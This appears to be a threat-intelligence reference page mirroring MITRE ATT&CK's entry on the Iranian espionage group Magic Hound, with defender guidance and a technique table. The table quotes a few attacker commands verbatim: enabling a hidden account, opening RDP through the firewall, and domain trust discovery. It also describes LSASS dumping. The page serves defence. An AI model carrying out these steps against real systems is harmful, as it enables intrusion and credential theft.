G0059: Magic Hound
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.[1][2][3][4][5]
Analyst context for executives and security teams
Magic Hound matters because MITRE describes it as a long-running, resource-intensive Iranian-sponsored cyber espionage group using complex social engineering against government, military, academic, journalist, and health-related targets. For leaders, the practical risk is not only malware execution; it is the combination of human targeting, credential theft, discovery, and remote access behaviors that can turn a successful lure into sustained access to sensitive people, accounts, and systems.
Executive priority
Prioritize this as an identity, endpoint, and incident-readiness problem for organizations with exposed executives, researchers, policy, defense, media, health, or regional interests. Ask whether high-risk users have phishing-resistant account protections, whether credential dumping and remote administration activity would be visible, and whether incident response can quickly determine which accounts, hosts, and sensitive files were accessed after a social-engineering-led intrusion.
Technical view
ATT&CK does not provide group-level tactics, platforms, or detection text for this object, so validation should be driven by the related techniques and software. Relationships show use of Windows-oriented credential and admin tooling such as Mimikatz, PsExec, Net, ipconfig, netsh, CharmPower, and PowerLess; cross-platform tools such as Pupy, Impacket, and FRP; and techniques including LSASS Memory, local data collection, network and user discovery, RDP, command obfuscation, and encoded files. SOC teams should test whether they can correlate social-engineering entry indicators with endpoint process execution, PowerShell activity, credential access attempts, RDP logons, discovery commands, and proxy or remote-access tooling.
Likely telemetry
- Email, web, and collaboration security logs for social-engineering delivery and suspicious links where available
- Identity provider and authentication logs, including unusual sign-ins, MFA events, and account takeover indicators
- Endpoint process creation and command-line telemetry for Net, ipconfig, netsh, systeminfo, ping, PowerShell, PsExec-like execution, and obfuscated commands
- Windows security and EDR events related to LSASS access or credential dumping behavior
- RDP logon records, lateral movement indicators, and administrative remote execution activity
Detection direction
- Do not rely on a single Magic Hound signature; ATT&CK provides no official detection guidance for this group object.
- Prioritize behavior chains: social engineering or credential activity followed by discovery commands, LSASS access, RDP, PsExec/Impacket-style remote execution, and data staging or local file access.
- Tune carefully for legitimate administration tools. Net, PsExec, ping, ipconfig, netsh, systeminfo, RDP, and Impacket-like activity may be benign in admin contexts, so detections should include user, host role, time, parent process, command-line, and remote peer context.
- Validate PowerShell visibility because related software includes PowerShell-based modular backdoors CharmPower and PowerLess.
- Review blind spots around personal or third-party communications channels, unmanaged devices, and high-risk individuals, since the official description emphasizes complex social engineering and targeting of people as well as organizations.
Mitigation priorities
- Start with high-risk user protection: phishing-resistant MFA where feasible, strong account recovery controls, and security awareness focused on targeted social engineering.
- Reduce credential theft impact by limiting local admin rights, protecting privileged accounts, and monitoring or restricting access to LSASS where supported by the environment.
- Harden and monitor remote administration paths such as RDP, PsExec-style execution, and administrative shares; restrict exposure and require strong authentication.
- Improve endpoint logging for command-line, PowerShell, script execution, and credential access events before relying on advanced analytics.
- Segment sensitive research, policy, executive, and operational systems so a compromised user account does not provide broad discovery or lateral movement paths.
Analyst notes and limits
The strongest decision value comes from the relationship context: Magic Hound is associated with credential dumping, discovery, remote access, obfuscation, local data collection, and multiple dual-use or open-source tools. The group also consolidates the revoked Charming Kitten object, so defenders should map historical reporting names such as TA453, APT35, Phosphorus, COBALT ILLUSION, Newscaster, and Mint Sandstorm when searching threat intelligence and internal cases.
ATT&CK supplies no official detection text, no group-level platforms, and no group-level tactics for this object. The take therefore avoids claiming detection coverage or current exploitation and uses only the supplied description, references, aliases, and relationships. Local telemetry, asset exposure, user risk, and business mission context are required to determine actual priority.
Magic Hound
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.[1][2][3][4][5]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1056.001 | Keylogging Sub-technique | Magic Hound malware is capable of keylogging.CitationUnit 42 Magic Hound Feb 2017 |
| Enterprise | T1567 | Exfiltration Over Web Service | Magic Hound has used the Telegram API `sendMessage` to relay data on compromised devices.CitationGoogle Iran Threats October 2021 |
| Enterprise | T1589.001 | Credentials Sub-technique | Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites. Magic Hound has also collected credentials from over 900 Fortinet VPN servers in the US, Europe, and Israel.CitationIBM ITG18 2020CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Magic Hound malware has used Registry Run keys to establish persistence.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Magic Hound has used PowerShell for execution and privilege escalation.CitationUnit 42 Magic Hound Feb 2017CitationFireEye APT35 2018CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1016.002 | Wi-Fi Discovery Sub-technique | Magic Hound has collected names and passwords of all Wi-Fi networks to which a device has previously connected.CitationCheck Point APT35 CharmPower January 2022 |
| Enterprise | T1588.002 | Tool Sub-technique | Magic Hound has obtained and used tools like Havij, sqlmap, Metasploit, Mimikatz, and Plink.CitationCheck Point Rocket KittenCitationFireEye APT35 2018CitationCheck Point APT35 CharmPower January 2022CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1584.001 | Domains Sub-technique | Magic Hound has used compromised domains to host links targeted to specific phishing victims.CitationClearSky Kittens Back 3 August 2020CitationProofpoint TA453 July2021CitationCertfa Charming Kitten January 2021CitationGoogle Iran Threats October 2021 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Magic Hound has used the command-line interface for code execution.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1572 | Protocol Tunneling | Magic Hound has used Plink to tunnel RDP over SSH.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1585.002 | Email Accounts Sub-technique | Magic Hound has established email accounts using fake personas for spearphishing operations.CitationIBM ITG18 2020CitationProofpoint TA453 March 2021 |
| Enterprise | T1591.001 | Determine Physical Locations Sub-technique | Magic Hound has collected location information from visitors to their phishing sites.CitationGoogle Iran Threats October 2021 |
| Enterprise | T1071 | Application Layer Protocol | Magic Hound malware has used IRC for C2.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Phosphorus November 2021 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Magic Hound has used HTTP for C2.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1486 | Data Encrypted for Impact | Magic Hound has used BitLocker and DiskCryptor to encrypt targeted workstations. CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1016.001 | Internet Connection Discovery Sub-technique | Magic Hound has conducted a network call out to a specific website as part of their initial discovery activity.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1586.002 | Email Accounts Sub-technique | Magic Hound has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.CitationIBM ITG18 2020 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Magic Hound has used scheduled tasks to establish persistence and execution.CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1592.002 | Software Sub-technique | Magic Hound has captured the user-agent strings from visitors to their phishing sites.CitationGoogle Iran Threats October 2021 |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | Magic Hound has used Remote Desktop Services to copy tools on targeted systems.CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1087.003 | Email Account Sub-technique | Magic Hound has used Powershell to discover email accounts.CitationDFIR Report APT35 ProxyShell March 2022 |
| Enterprise | T1105 | Ingress Tool Transfer | Magic Hound has downloaded additional code and files from servers onto victims.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1190 | Exploit Public-Facing Application | Magic Hound has exploited the Log4j utility (CVE-2021-44228), on-premises MS Exchange servers via "ProxyShell" (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and Fortios SSL VPNs (CVE-2018-13379).CitationCheck Point APT35 CharmPower January 2022CitationDFIR Report APT35 ProxyShell March 2022CitationCybereason PowerLess February 2022CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021CitationMicrosoft Log4j Vulnerability Exploitation December 2021 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Magic Hound has attempted to lure victims into opening malicious email attachments.CitationClearSky Kittens Back 3 August 2020 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Magic Hound has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.CitationDFIR Report APT35 ProxyShell March 2022 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | Magic Hound has used base64-encoded commands.CitationUnit 42 Magic Hound Feb 2017CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1046 | Network Service Discovery | Magic Hound has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1590.005 | IP Addresses Sub-technique | Magic Hound has captured the IP addresses of visitors to their phishing sites.CitationGoogle Iran Threats October 2021 |
| Enterprise | T1113 | Screen Capture | Magic Hound malware can take a screenshot and upload the file to its C2 server.CitationUnit 42 Magic Hound Feb 2017 |
| Enterprise | T1573 | Encrypted Channel | Magic Hound has used an encrypted http proxy in C2 communications.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Magic Hound malware has used VBS scripts for execution.CitationUnit 42 Magic Hound Feb 2017 |
| Enterprise | T1685.001 | Disable or Modify Windows Event Log Sub-technique | Magic Hound has executed scripts to disable the event log service.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1595.002 | Vulnerability Scanning Sub-technique | Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 in Log4j and ProxyShell vulnerabilities; CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in on-premises MS Exchange Servers; and CVE-2018-13379 in Fortinet FortiOS SSL VPNs.CitationCheck Point APT35 CharmPower January 2022CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1036.010 | Masquerade Account Name Sub-technique | Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines.CitationDFIR Report APT35 ProxyShell March 2022CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1589.002 | Email Addresses Sub-technique | Magic Hound has identified high-value email accounts in academia, journalism, NGO's, foreign policy, and national security for targeting.CitationProofpoint TA453 July2021CitationGoogle Iran Threats October 2021 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Magic Hound has attempted to lure victims into opening malicious links embedded in emails.CitationClearSky Kittens Back 3 August 2020CitationCertfa Charming Kitten January 2021 |
| Enterprise | T1102.002 | Bidirectional Communication Sub-technique | Magic Hound malware can use a SOAP Web service to communicate with its C2 server.CitationUnit 42 Magic Hound Feb 2017 |
| Enterprise | T1033 | System Owner/User Discovery | Magic Hound malware has obtained the victim username and sent it to the C2 server.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1098.002 | Additional Email Delegate Permissions Sub-technique | Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.CitationFireEye APT35 2018 |
| Enterprise | T1070.004 | File Deletion Sub-technique | Magic Hound has deleted and overwrote files to cover tracks.CitationUnit 42 Magic Hound Feb 2017CitationFireEye APT35 2018CitationDFIR Phosphorus November 2021 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Magic Hound malware has used base64-encoded files and has also encrypted embedded strings with AES.CitationUnit 42 Magic Hound Feb 2017CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.CitationSecureworks Cobalt Gypsy Feb 2017CitationClearSky Kittens Back 3 August 2020CitationCertfa Charming Kitten January 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1078.001 | Default Accounts Sub-technique | Magic Hound enabled and used the default system managed account, DefaultAccount, via `"powershell.exe" /c net user DefaultAccount /active:yes` to connect to a targeted Exchange server over RDP.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1083 | File and Directory Discovery | Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.CitationUnit 42 Magic Hound Feb 2017 |
| Enterprise | T1016 | System Network Configuration Discovery | Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Magic Hound has used `dllhost.exe` to mask Fast Reverse Proxy (FRP) and `MicrosoftOutLookUpdater.exe` for Plink.CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1098.007 | Additional Local or Domain Groups Sub-technique | Magic Hound has added a user named DefaultAccount to the Administrators and Remote Desktop Users groups.CitationDFIR Report APT35 ProxyShell March 2022 |
| Enterprise | T1598.003 | Spearphishing Link Sub-technique | Magic Hound has used SMS and email messages with links designed to steal credentials or track victims.CitationCertfa Charming Kitten January 2021CitationClearSky Kittens Back 3 August 2020CitationProofpoint TA453 March 2021CitationProofpoint TA453 July2021CitationGoogle Iran Threats October 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1049 | System Network Connections Discovery | Magic Hound has used quser.exe to identify existing RDP connections.CitationDFIR Report APT35 ProxyShell March 2022 |
| Enterprise | T1114 | Email Collection | Magic Hound has compromised email credentials in order to steal sensitive data.CitationCertfa Charming Kitten January 2021 |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | Magic Hound has stolen domain credentials by dumping LSASS process memory using Task Manager, comsvcs.dll, and from a Microsoft Active Directory Domain Controller using Mimikatz.CitationFireEye APT35 2018CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1570 | Lateral Tool Transfer | Magic Hound has copied tools within a compromised network using RDP.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1136.001 | Local Account Sub-technique | Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines.CitationDFIR Report APT35 ProxyShell March 2022CitationMicrosoft Iranian Threat Actor Trends November 2021 |
| Enterprise | T1057 | Process Discovery | Magic Hound malware can list running processes.CitationUnit 42 Magic Hound Feb 2017 |
| Enterprise | T1114.002 | Remote Email Collection Sub-technique | Magic Hound has exported emails from compromised Exchange servers including through use of the cmdlet `New-MailboxExportRequest.`CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1571 | Non-Standard Port | Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Phosphorus November 2021 |
| Enterprise | T1686.003 | Windows Host Firewall Sub-technique | Magic Hound has added the following rule to a victim's Windows firewall to allow RDP traffic - `"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389`.CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1070.003 | Clear Command History Sub-technique | Magic Hound has removed mailbox export requests from compromised Exchange servers.CitationDFIR Report APT35 ProxyShell March 2022 |
| Enterprise | T1082 | System Information Discovery | Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.CitationUnit 42 Magic Hound Feb 2017CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1114.001 | Local Email Collection Sub-technique | Magic Hound has collected .PST archives.CitationFireEye APT35 2018 |
| Enterprise | T1505.003 | Web Shell Sub-technique | Magic Hound has used multiple web shells to gain execution.CitationDFIR Report APT35 ProxyShell March 2022CitationDFIR Phosphorus November 2021 |
| Enterprise | T1090 | Proxy | Magic Hound has used Fast Reverse Proxy (FRP) for RDP traffic.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Magic Hound has named a malicious script CacheTask.bat to mimic a legitimate task.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1583.001 | Domains Sub-technique | Magic Hound has registered fraudulent domains such as "mail-newyorker.com" and "news12.com.recover-session-service.site" to target specific victims with phishing attacks.CitationCertfa Charming Kitten January 2021 |
| Enterprise | T1018 | Remote System Discovery | Magic Hound has used Ping for discovery on targeted networks.CitationDFIR Phosphorus November 2021 |
| Enterprise | T1112 | Modify Registry | Magic Hound has modified Registry settings for security tools.CitationDFIR Report APT35 ProxyShell March 2022 |
| Enterprise | T1482 | Domain Trust Discovery | Magic Hound has used a web shell to execute `nltest /trusted_domains` to identify trust relationships.CitationDFIR Phosphorus November 2021 |
Groups, software, and campaigns
G0058: Charming Kitten
Charming Kitten is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten often tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, Magic Hound, resulting in reporting that may not distinguish between the two groups' activities.[1]
S0039: Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [1]
Net has a great deal of functionality, [2] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
S0357: Impacket
S0097: Ping
S0674: CharmPower
CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.[1]
S1144: FRP
FRP, which stands for Fast Reverse Proxy, is an openly available tool that is capable of exposing a server located behind a firewall or Network Address Translation (NAT) to the Internet. FRP can support multiple protocols including TCP, UDP, and HTTP(S) and has been abused by threat actors to proxy command and control communications.[1][2][3][4]
S0002: Mimikatz
S0096: Systeminfo
Systeminfo is a Windows utility that can be used to gather detailed information about a computer. [1]
S0100: ipconfig
S0108: netsh
S1012: PowerLess
PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.[1]
S0192: Pupy
Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [1] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [1] Pupy is publicly available on GitHub. [1]
S0186: DownPaper
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 6.1 | Current bundle | b29c155c46a7… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
FireEye APT35 2018
Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024.
Open source URL -
[2]
ClearSky Kittens Back 3 August 2020
ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.
Open source URL -
[3]
Certfa Charming Kitten January 2021
Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.
Open source URL -
[4]
Secureworks COBALT ILLUSION Threat Profile
Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.
Open source URL -
[5]
Proofpoint TA453 July2021
Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.
Open source URL -
[6]
APT35
(Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022)
-
[7]
COBALT ILLUSION
(Citation: Secureworks COBALT ILLUSION Threat Profile)
-
[8]
Charming Kitten
(Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)
-
[9]
Check Point APT35 CharmPower January 2022
Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.
Open source URL -
[10]
ClearSky Charming Kitten Dec 2017
ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
Open source URL -
[11]
ClearSky Kittens Back 2 Oct 2019
ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.
Open source URL -
[12]
Eweek Newscaster and Charming Kitten May 2014
Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.
Open source URL -
[13]
IBM ITG18 2020
Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.
Open source URL -
[14]
ITG18
(Citation: IBM ITG18 2020)
-
[15]
Magic Hound
(Citation: Unit 42 Magic Hound Feb 2017)
-
[16]
Microsoft Phosphorus Mar 2019
Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.
Open source URL -
[17]
Microsoft Phosphorus Oct 2020
Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.
Open source URL -
[18]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[19]
Mint Sandstorm
(Citation: Microsoft Threat Actor Naming July 2023)
-
[20]
Newscaster
Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)
-
[21]
Phosphorus
(Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)
-
[22]
Proofpoint TA453 March 2021
Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.
Open source URL -
[23]
TA453
(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)
-
[24]
US District Court of DC Phosphorus Complaint 2019
US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.
Open source URL -
[25]
Unit 42 Magic Hound Feb 2017
Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
Open source URL -
[26]
mitre-attack G0059Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.